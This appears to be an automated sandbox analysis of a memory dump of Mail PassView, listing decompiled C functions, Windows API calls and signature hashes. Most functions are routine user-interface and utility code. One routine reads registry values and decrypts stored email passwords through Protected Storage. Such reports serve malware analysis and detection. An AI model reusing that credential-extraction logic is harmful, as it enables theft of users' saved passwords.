Mail PassView, xrefs: 0040B76B

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ClassCreateRegisterWindow
String ID: Mail PassView$MailPassView
API String ID: 3469048531-1277648965
Opcode ID: 7d9b3190e156b9bfff027be3e0f607fb910863f17b47cbf685ca248547ef7640
Instruction ID: f223c9819260e0b75888b36d0bfde8daf7ba5992c102a2aca34afaaeb944facf
Opcode Fuzzy Hash: 7d9b3190e156b9bfff027be3e0f607fb910863f17b47cbf685ca248547ef7640
Instruction Fuzzy Hash: 3601ECB5D01248ABDB10CF96CD45ADFFFF8EB99B00F10812AE555F2250D7B46544CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00401085, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401085(void* __esi, void* __eflags) {
				struct tagLOGFONTA _v64;
				int _t10;
				long _t11;

				E00406191( &_v64, "MS Sans Serif", 0xa, 1);
				_t10 = CreateFontIndirectA( &_v64);
				 *(__esi + 0x20c) = _t10;
				_t11 = SendDlgItemMessageA( *(__esi + 4), 0x3ec, 0x30, _t10, 0);
				if( *0x417388 != 0) {
					return SendDlgItemMessageA( *(__esi + 4), 0x3ee, 0x30,  *(__esi + 0x20c), 0);
				}
				return _t11;
			}

0x00401098
0x004010a4
0x004010bd
0x004010c3
0x004010cc
0x00000000
0x004010e0
0x004010e4

APIs

Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB

CreateFontIndirectA.GDI32(?), ref: 004010A4
SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 004010C3
SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 004010E0

Strings

MS Sans Serif, xrefs: 00401090

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ItemMessageSend$CreateFontIndirectmemsetstrcpy
String ID: MS Sans Serif
API String ID: 4251605573-168460110
Opcode ID: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
Instruction ID: 11d026e54a5ae2454c64c325e08d9e616df03e05f7163fa19ba200447038793b
Opcode Fuzzy Hash: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
Instruction Fuzzy Hash: 73F0A775A8034877E72167A0ED47F8A7BACAB40B00F10C135FB61B51E1D6F47554DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE43, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DE43(void** __eax, struct HWND__* _a4) {
				int _t6;
				void** _t10;

				_t10 = __eax;
				if( *0x417510 == 0) {
					memcpy(0x416e70,  *__eax, 0x50);
					memcpy(0x416ba0,  *(_t10 + 4), 0x2cc);
					 *0x417510 = 1;
					_t6 = DialogBoxParamA( *0x416b94, 0x6b, _a4, E0040DB39, 0);
					 *0x417510 =  *0x417510 & 0x00000000;
					 *0x416b9c = _t6;
					return 1;
				} else {
					return 1;
				}
			}

0x0040de4b
0x0040de4d
0x0040de5d
0x0040de6f
0x0040de8d
0x0040de93
0x0040de99
0x0040dea0
0x0040dea8
0x0040de4f
0x0040de53
0x0040de53

APIs

memcpy.MSVCRT ref: 0040DE5D
memcpy.MSVCRT ref: 0040DE6F
DialogBoxParamA.USER32 ref: 0040DE93

Strings

V7, xrefs: 0040DE6F

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memcpy$DialogParam
String ID: V7
API String ID: 392721444-2959985473
Opcode ID: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
Instruction ID: 1a8743d5fef8bbef7923f2c95fec7d45d4f15d0a806a7122114c86eec2fd18b9
Opcode Fuzzy Hash: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
Instruction Fuzzy Hash: 93F0A7716843207BD7116F54AC06BC63BF2B704B5AF114926F149E40E1D3F56550CBCC

Uniqueness

Uniqueness Score: -1.00%

Function 004062D1, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E004062D1(struct HWND__* _a4) {
				void _v259;
				char _v260;
				signed int _t10;

				_v260 = 0;
				memset( &_v259, 0, 0xff);
				GetClassNameA(_a4,  &_v260, 0xff);
				_t10 =  &_v260;
				_push("edit");
				_push(_t10);
				L004115B2();
				asm("sbb eax, eax");
				return  ~_t10 + 1;
			}

0x004062ea
0x004062f1
0x00406304
0x0040630a
0x00406310
0x00406315
0x00406316
0x0040631f
0x00406324

APIs

memset.MSVCRT ref: 004062F1
GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
_stricmp.MSVCRT(00000000,edit), ref: 00406316

Strings

edit, xrefs: 00406310

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ClassName_stricmpmemset
String ID: edit
API String ID: 3665161774-2167791130
Opcode ID: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
Instruction ID: 6efc07277a00def775dca084f59963aaad452a70fda198cb5006c56c80a8bddd
Opcode Fuzzy Hash: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
Instruction Fuzzy Hash: 75E09BB3C4412A7ADB21A764DC05FE53BAC9F59305F0001B6BD46E10D5E5B497C887A5

Uniqueness

Uniqueness Score: -1.00%

Function 0040EDAC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EDAC() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x417520 == 0) {
					_t1 = LoadLibraryA("shell32.dll");
					 *0x417520 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathA");
						 *0x41751c = _t2;
						return _t2;
					}
				}
				return _t1;
			}

0x0040edb3
0x0040edba
0x0040edc2
0x0040edc7
0x0040edcf
0x0040edd5
0x00000000
0x0040edd5
0x0040edc7
0x0040edda

APIs

LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,74E04DE0,?,00000000), ref: 0040EDBA
GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF

Strings

shell32.dll, xrefs: 0040EDB5
SHGetSpecialFolderPathA, xrefs: 0040EDC9

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetSpecialFolderPathA$shell32.dll
API String ID: 2574300362-543337301
Opcode ID: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
Instruction ID: 9298da647e7f97f850720a93b521a1101e1548fa407b312faad19db7241a3124
Opcode Fuzzy Hash: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
Instruction Fuzzy Hash: 4BD0C970649202EFC7008F21AE097813ABABB18703F10C537A506E1AA0F7B88190CF5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040FE05, Relevance: 6.3, APIs: 5, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040FE05(intOrPtr* __esi, void* __eflags) {
				void* _t27;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t44;

				_t44 = __esi;
				 *__esi = 0x414288;
				_t27 = E00406549(0x46c, __esi);
				_push(0x20);
				L004115D0();
				if(_t27 == 0) {
					_t28 = 0;
				} else {
					_t28 = E00406A2C(_t27);
				}
				_push(0x20);
				 *((intOrPtr*)(_t44 + 0x450)) = _t28;
				L004115D0();
				if(_t28 == 0) {
					_t29 = 0;
				} else {
					_t29 = E00406A2C(_t28);
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x454)) = _t29;
				L004115D0();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x458)) = _t29;
				L004115D0();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x45c)) = _t29;
				L004115D0();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				 *((intOrPtr*)(_t44 + 0x460)) = _t29;
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x450)) + 0x14)) = 0x2000;
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x454)) + 0x14)) = 0x2000;
				 *((intOrPtr*)(_t44 + 0x3c)) = 1;
				 *((intOrPtr*)(_t44 + 0x40)) = 1;
				 *((intOrPtr*)(_t44 + 0x44)) = 1;
				 *((intOrPtr*)(_t44 + 0x48)) = 1;
				return _t44;
			}

0x0040fe05
0x0040fe0d
0x0040fe13
0x0040fe18
0x0040fe1a
0x0040fe25
0x0040fe2e
0x0040fe27
0x0040fe27
0x0040fe27
0x0040fe30
0x0040fe32
0x0040fe38
0x0040fe40
0x0040fe49
0x0040fe42
0x0040fe42
0x0040fe42
0x0040fe4b
0x0040fe4d
0x0040fe53
0x0040fe60
0x0040fe72
0x0040fe62
0x0040fe62
0x0040fe65
0x0040fe67
0x0040fe6a
0x0040fe6d
0x0040fe6d
0x0040fe74
0x0040fe76
0x0040fe7c
0x0040fe84
0x0040fe96
0x0040fe86
0x0040fe86
0x0040fe89
0x0040fe8b
0x0040fe8e
0x0040fe91
0x0040fe91
0x0040fe98
0x0040fe9a
0x0040fea0
0x0040fea8
0x0040feba
0x0040feaa
0x0040feaa
0x0040fead
0x0040feaf
0x0040feb2
0x0040feb5
0x0040feb5
0x0040fec2
0x0040fecd
0x0040fed6
0x0040fedd
0x0040fee0
0x0040fee3
0x0040fee6
0x0040feec

APIs

Part of subcall function 00406549: memset.MSVCRT ref: 00406557

??2@YAPAXI@Z.MSVCRT ref: 0040FE1A
??2@YAPAXI@Z.MSVCRT ref: 0040FE38
??2@YAPAXI@Z.MSVCRT ref: 0040FE53
??2@YAPAXI@Z.MSVCRT ref: 0040FE7C
??2@YAPAXI@Z.MSVCRT ref: 0040FEA0

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
Instruction ID: d938b1c2a289ef47e5423cea375f2860c04713c819a512dfc676868f3ea794ac
Opcode Fuzzy Hash: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
Instruction Fuzzy Hash: CC3146B0A107008FD7609F3AD845666FBE4EF80355F25887FD20ADB6B2E7B8D4448B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD0B, Relevance: 6.3, APIs: 5, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040BD0B(void* __edi, void* __esi, void* _a4) {
				signed int _t13;
				signed int _t25;
				int _t26;
				char* _t30;
				void* _t31;
				void* _t33;
				void* _t35;

				_t35 = __esi;
				_t25 = 0x3f;
				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
				_t30 = __esi + 0x18 + _t13;
				 *_t30 = 0x80;
				_t26 = _t25 - _t13;
				_t31 = _t30 + 1;
				if(_t26 >= 8) {
					memset(_t31, 0, _t26 + 0xfffffff8);
				} else {
					memset(_t31, 0, _t26);
					_t33 = __esi + 0x18;
					E0040BD8A(_t33, __esi);
					memset(_t33, 0, 0x38);
				}
				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
				E0040BD8A(_t35 + 0x18, _t35);
				memcpy(_a4, _t35, 0x10);
				return memset(_t35, 0, 4);
			}

0x0040bd0b
0x0040bd13
0x0040bd14
0x0040bd16
0x0040bd1a
0x0040bd1d
0x0040bd1f
0x0040bd23
0x0040bd52
0x0040bd25
0x0040bd2a
0x0040bd2f
0x0040bd36
0x0040bd40
0x0040bd48
0x0040bd5d
0x0040bd63
0x0040bd6b
0x0040bd77
0x0040bd89

APIs

memset.MSVCRT ref: 0040BD2A
memset.MSVCRT ref: 0040BD40
memset.MSVCRT ref: 0040BD52
memcpy.MSVCRT ref: 0040BD77
memset.MSVCRT ref: 0040BD81

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
Instruction ID: 14e83d3a51f9c3b731822f35bbce0da2433a64988b134a744f8d54487411a0b4
Opcode Fuzzy Hash: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
Instruction Fuzzy Hash: 6F01F5B1680B0026D2356B26CC02F9A77A5AFA0714F000B1EF643666D1D7ACE244869C

Uniqueness

Uniqueness Score: -1.00%

Function 0040246C, Relevance: 6.1, APIs: 4, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040246C(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
				void _v2058;
				char _v2060;
				char _v2069;
				char _v2070;
				char _v2071;
				char _v2072;
				char _v3086;
				signed char _v3090;
				char _v3091;
				char _v3092;
				char* _v3096;
				char _v3100;
				short* _v3104;
				int _v3108;
				char _v3112;
				void* __ebx;
				void* _t49;
				signed int _t61;
				short* _t76;
				void* _t83;
				signed int _t87;
				void* _t90;

				_t83 = __eax;
				_t73 = 0;
				 *_a12 = 0;
				_v3112 = 0x400;
				_t49 = E0040EBA3(__ecx, _a4, _a8,  &_v3092,  &_v3112);
				_t90 = (_t87 & 0xfffffff8) - 0xc28 + 0x10;
				if(_t49 == 0) {
					_v2069 = 0;
					_v2070 = 0;
					_v2071 = 0;
					_v2072 = 0;
					if(_v3092 != 1) {
						if(_v3092 == 2 &&  *((intOrPtr*)(_t83 + 0xa94)) != 0) {
							_v3100 = _v3112 - 1;
							_v3096 =  &_v3091;
							if(E00404811(_t83 + 0x890,  &_v3100, 0,  &_v3108) != 0) {
								WideCharToMultiByte(0, 0, _v3104, _v3108, _a12, 0x7f, 0, 0);
								LocalFree(_v3104);
							}
						}
					} else {
						if( *((intOrPtr*)(_t83 + 0x888)) != 0) {
							if(_a16 == 0) {
								E0040E988(_a12, _t83 + 0x87c,  &_v3090, 0x7f, 0);
							} else {
								_v2060 = 0;
								memset( &_v2058, 0, 0x800);
								_t90 = _t90 + 0xc;
								_t76 =  &_v2060;
								E0040E988(_t76, _t83 + 0x87c,  &_v3091, 0x400, 1);
								WideCharToMultiByte(0, 0, _t76, 0xffffffff, _a12, 0x7f, 0, 0);
							}
							_t73 = 0;
						}
						_t79 = _a12;
						if( *_a12 == _t73 && _v3112 >= 7 && _v3092 == 1 && _v3091 == 1) {
							_t61 = _v3090 & 0x000000ff;
							if(_t61 > 1 && _v3112 >= _t61 + 6) {
								E00401DFD(_t79,  &_v3086, _t61);
							}
						}
					}
				}
				return 0 |  *_a12 != _t73;
			}

0x0040247a
0x0040247f
0x00402481
0x00402490
0x0040249b
0x004024a0
0x004024a5
0x004024b0
0x004024b7
0x004024be
0x004024c5
0x004024cc
0x0040259e
0x004025ad
0x004025b5
0x004025d1
0x004025e4
0x004025ee
0x004025ee
0x004025d1
0x004024d2
0x004024d8
0x004024dd
0x00402546
0x004024df
0x004024ed
0x004024f5
0x004024fa
0x00402510
0x00402517
0x0040252c
0x0040252c
0x0040254b
0x0040254b
0x0040254d
0x00402552
0x00402575
0x0040257d
0x0040258f
0x00402594
0x0040257d
0x00402552
0x004024cc
0x00402603

APIs

Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 0040252C
memset.MSVCRT ref: 004024F5

Part of subcall function 0040E988: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
Part of subcall function 0040E988: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
Part of subcall function 0040E988: memcpy.MSVCRT ref: 0040EA04
Part of subcall function 0040E988: CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13

WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 004025E4
LocalFree.KERNEL32(?), ref: 004025EE

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
String ID:
API String ID: 3503910906-0
Opcode ID: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
Instruction ID: 8b275e149f62785490509d2466391155d2af3f8991a5b00387cc308873e1222d
Opcode Fuzzy Hash: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
Instruction Fuzzy Hash: 7041B4B1408384BFD711DB608D44AEBBBDCBB48308F44493EFA98A21D1D678DA54DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00406C87, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406C87(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* __edi;
				void* __esi;
				void* _t65;
				intOrPtr _t73;
				void* _t76;
				void* _t79;
				char _t83;
				signed int _t95;
				intOrPtr _t96;
				void** _t98;
				intOrPtr* _t100;
				intOrPtr _t101;
				signed int _t103;

				_t95 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v28 = 1;
				_v24 = 0;
				_v40 = 0;
				_v52 = 0;
				_v48 = 0;
				_v36 = 0x100;
				_v44 = 0;
				E00406A4E(_a4);
				_t100 = _a8;
				if( *_t100 == 0) {
					L26:
					_t101 = _a4;
					L27:
					_t96 =  *((intOrPtr*)(_t101 + 0x1c));
					 *((intOrPtr*)(_t101 + 0x30)) = _t96;
					E00406B5B( &_v52);
					return _t96;
				} else {
					goto L1;
				}
				do {
					L1:
					_t87 = _v16 + _t100;
					_t65 =  *_t87;
					_v32 = _t87;
					if(_t65 != 0x20 || _v24 != 0) {
						if(_t65 != 0x22) {
							if(_t95 != 0) {
								L19:
								_v8 =  *_t87;
								E00406B25( &_v52, _t95);
								_t87 = _v8;
								 *((char*)(_v52 + _t95)) = _v8;
								_t95 = _t95 + 1;
								_v12 = _t95;
								L20:
								_v28 = 0;
								goto L21;
							}
							if(_t65 == 0x20) {
								goto L20;
							}
							_t98 = _a4 + 0x20;
							if(_v20 >= 0) {
								_t103 = _v20;
								_t76 = _t98[2];
								if(_t103 != 0xffffffff) {
									E004060FA( &(_t98[1]), _t103, _t98, 4, _t76);
								} else {
									free( *_t98);
								}
								_t79 = _t103 + 1;
								if(_t98[3] < _t79) {
									_t98[3] = _t79;
								}
								 *((intOrPtr*)( *_t98 + _t103 * 4)) = _v16;
								_t100 = _a8;
								_t87 = _v32;
							}
							_t95 = _v12;
							goto L19;
						}
						_v24 = _v24 ^ 0x00000001;
						goto L20;
					} else {
						if(_v28 == 0) {
							E00406B25( &_v52, _t95);
							_t83 = _v52;
							 *((char*)(_t83 + _t95)) = 0;
							if(_t83 == 0) {
								_t83 = 0x412466;
							}
							E00406A74(_a4, _t87, _t83);
							_v20 = _v20 + 1;
							_v28 = 1;
							_v12 = 0;
							_t95 = 0;
						}
					}
					L21:
					_v16 = _v16 + 1;
				} while ( *((intOrPtr*)(_v16 + _t100)) != 0);
				if(_t95 <= 0) {
					goto L26;
				}
				E00406B25( &_v52, _t95);
				_t73 = _v52;
				 *((char*)(_t73 + _t95)) = 0;
				if(_t73 == 0) {
					_t73 = 0x412466;
				}
				_t101 = _a4;
				E00406A74(_t101, _t87, _t73);
				goto L27;
			}

0x00406c95
0x00406c97
0x00406c9a
0x00406c9d
0x00406ca0
0x00406ca7
0x00406caa
0x00406cad
0x00406cb0
0x00406cb3
0x00406cba
0x00406cbd
0x00406cc2
0x00406cc7
0x00406dd1
0x00406dd1
0x00406dd4
0x00406dd4
0x00406dd7
0x00406ddd
0x00406de8
0x00000000
0x00000000
0x00000000
0x00406ccd
0x00406ccd
0x00406cd0
0x00406cd3
0x00406cd7
0x00406cda
0x00406d1f
0x00406d29
0x00406d79
0x00406d7b
0x00406d83
0x00406d8b
0x00406d8e
0x00406d91
0x00406d92
0x00406d95
0x00406d95
0x00000000
0x00406d95
0x00406d2d
0x00000000
0x00000000
0x00406d32
0x00406d38
0x00406d3a
0x00406d40
0x00406d43
0x00406d56
0x00406d45
0x00406d47
0x00406d47
0x00406d5c
0x00406d63
0x00406d65
0x00406d65
0x00406d6d
0x00406d70
0x00406d73
0x00406d73
0x00406d76
0x00000000
0x00406d76
0x00406d21
0x00000000
0x00406ce1
0x00406ce4
0x00406cef
0x00406cf4
0x00406cf9
0x00406cfc
0x00406cfe
0x00406cfe
0x00406d07
0x00406d0c
0x00406d0f
0x00406d16
0x00406d19
0x00406d19
0x00406ce4
0x00406d98
0x00406d98
0x00406d9e
0x00406da9
0x00000000
0x00000000
0x00406db0
0x00406db5
0x00406dba
0x00406dbd
0x00406dbf
0x00406dbf
0x00406dc4
0x00406dca
0x00000000

APIs

Part of subcall function 00406A4E: free.MSVCRT(?,00406CC2,00000000,?,?), ref: 00406A51
Part of subcall function 00406A4E: free.MSVCRT(?,?,00406CC2,00000000,?,?), ref: 00406A59

free.MSVCRT(?,00000000,?,?), ref: 00406D47

Part of subcall function 00406B25: free.MSVCRT(Mt,00000000,Mt,00406D88,00000000,?,?), ref: 00406B34

Part of subcall function 004060FA: malloc.MSVCRT ref: 00406116
Part of subcall function 004060FA: memcpy.MSVCRT ref: 0040612E
Part of subcall function 004060FA: free.MSVCRT(00000000,00000000,Mt,00406B49,00000001,?,00000000,Mt,00406D88,00000000,?,?), ref: 00406137

Strings

Mt, xrefs: 00406D9B
Mt, xrefs: 00406CC2, 00406D70
Mt, xrefs: 00406CCD, 00406D68

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: free$mallocmemcpy
String ID: Mt$Mt$Mt
API String ID: 3401966785-877733200
Opcode ID: 0d8979ca83d77964b5e44f22b8dced07f100480b91d735ef0f206362fb305579
Instruction ID: 7250e0f20330e40a173f5fc6a92c528c9e1127f28f43d6e61f0a36e21e28d9d2
Opcode Fuzzy Hash: 0d8979ca83d77964b5e44f22b8dced07f100480b91d735ef0f206362fb305579
Instruction Fuzzy Hash: 22514871E0021AAFCB20DF99D4808DEFBB1BF54314B26817BE852B7381C734AA55CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3C4, Relevance: 6.1, APIs: 4, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040B3C4(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void _v263;
				char _v264;
				void* __edi;
				void* __esi;
				signed int _t42;
				signed int _t45;
				intOrPtr* _t60;
				signed char _t62;
				intOrPtr _t63;
				int _t65;

				_t61 = __ecx;
				_t60 = _a8;
				_t63 = __ecx;
				_v8 = __ecx;
				if( *(_t60 + 4) == 0x103 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffff4) {
					_t42 = E00408BA0( *((intOrPtr*)(__ecx + 0x370)), _t60);
					 *((intOrPtr*)(_t63 + 0x10c)) = 1;
					 *(_t63 + 0x110) = _t42;
				}
				if(_a4 == 0x101 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t60 + 0xc)) == 1) {
					_v264 = 0;
					memset( &_v263, 0, 0xff);
					E00401000(_t61,  &_v264, 0x412440);
					_t42 = E00406523( *((intOrPtr*)(_v8 + 0x108)),  &_v264);
					_t63 = _v8;
				}
				_t65 = 0;
				if( *((intOrPtr*)(_t60 + 8)) == 0xfffffdf8) {
					_t42 = SendMessageA( *(_t63 + 0x118), 0x423, 0, 0);
					if( *_t60 == _t42) {
						_t42 = GetMenuStringA( *(_t63 + 0x11c),  *(_t60 + 4), _t60 + 0x10, 0x4f, 0);
						 *((intOrPtr*)(_t60 + 0x60)) = 0;
					}
				}
				if(_a4 != 0x103) {
					L27:
					return _t42;
				} else {
					_t80 =  *((intOrPtr*)(_t60 + 8)) - 0xfffffffd;
					if( *((intOrPtr*)(_t60 + 8)) == 0xfffffffd) {
						_t42 = E0040AEAA(_t61, _t63, _t63, _t80);
						_t65 = 0;
					}
					if( *((intOrPtr*)(_t60 + 8)) == 0xffffff94) {
						_t42 = E00408ACB( *(_t60 + 0x10), _t61,  *((intOrPtr*)(_t63 + 0x370)), _t65);
						_t65 = 0;
					}
					if( *((intOrPtr*)(_t60 + 8)) != 0xffffff9b) {
						goto L27;
					} else {
						if( *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x370)) + 0x1b8)) == _t65) {
							_t62 = 2;
							_t45 =  *(_t60 + 0x14) & _t62;
							__eflags = _t45;
							if(_t45 == 0) {
								L20:
								__eflags = _t45 - _t62;
								if(_t45 == _t62) {
									L23:
									_t42 = 0;
									__eflags = 0;
									L24:
									if(_t42 == _t65) {
										goto L27;
									}
									_t42 = _t63 + 0x25c;
									if( *_t42 != _t65) {
										goto L27;
									}
									 *_t42 = 1;
									return PostMessageA( *(_t63 + 0x108), 0x402, _t65, _t65);
								}
								__eflags =  *(_t60 + 0x18) & _t62;
								if(( *(_t60 + 0x18) & _t62) == 0) {
									goto L23;
								}
								L22:
								_t42 = 1;
								goto L24;
							}
							__eflags =  *(_t60 + 0x18) & _t62;
							if(( *(_t60 + 0x18) & _t62) == 0) {
								goto L22;
							}
							goto L20;
						}
						asm("sbb eax, eax");
						_t42 =  ~( ~(( *(_t60 + 0x18) ^  *(_t60 + 0x14)) & 0x0000f002));
						goto L24;
					}
				}
			}

0x0040b3c4
0x0040b3ce
0x0040b3da
0x0040b3dc
0x0040b3df
0x0040b3ef
0x0040b3f4
0x0040b3fe
0x0040b3fe
0x0040b40b
0x0040b427
0x0040b42e
0x0040b43e
0x0040b44f
0x0040b454
0x0040b457
0x0040b45a
0x0040b463
0x0040b472
0x0040b47a
0x0040b48c
0x0040b492
0x0040b492
0x0040b47a
0x0040b49c
0x0040b539
0x0040b539
0x0040b4a2
0x0040b4a2
0x0040b4a6
0x0040b4aa
0x0040b4af
0x0040b4af
0x0040b4b5
0x0040b4c1
0x0040b4c6
0x0040b4c6
0x0040b4cc
0x00000000
0x0040b4ce
0x0040b4da
0x0040b4f4
0x0040b4f5
0x0040b4f5
0x0040b4f7
0x0040b4fe
0x0040b4fe
0x0040b500
0x0040b50c
0x0040b50c
0x0040b50c
0x0040b50e
0x0040b510
0x00000000
0x00000000
0x0040b512
0x0040b51a
0x00000000
0x00000000
0x0040b529
0x00000000
0x0040b52f
0x0040b502
0x0040b505
0x00000000
0x00000000
0x0040b507
0x0040b509
0x00000000
0x0040b509
0x0040b4f9
0x0040b4fc
0x00000000
0x00000000
0x00000000
0x0040b4fc
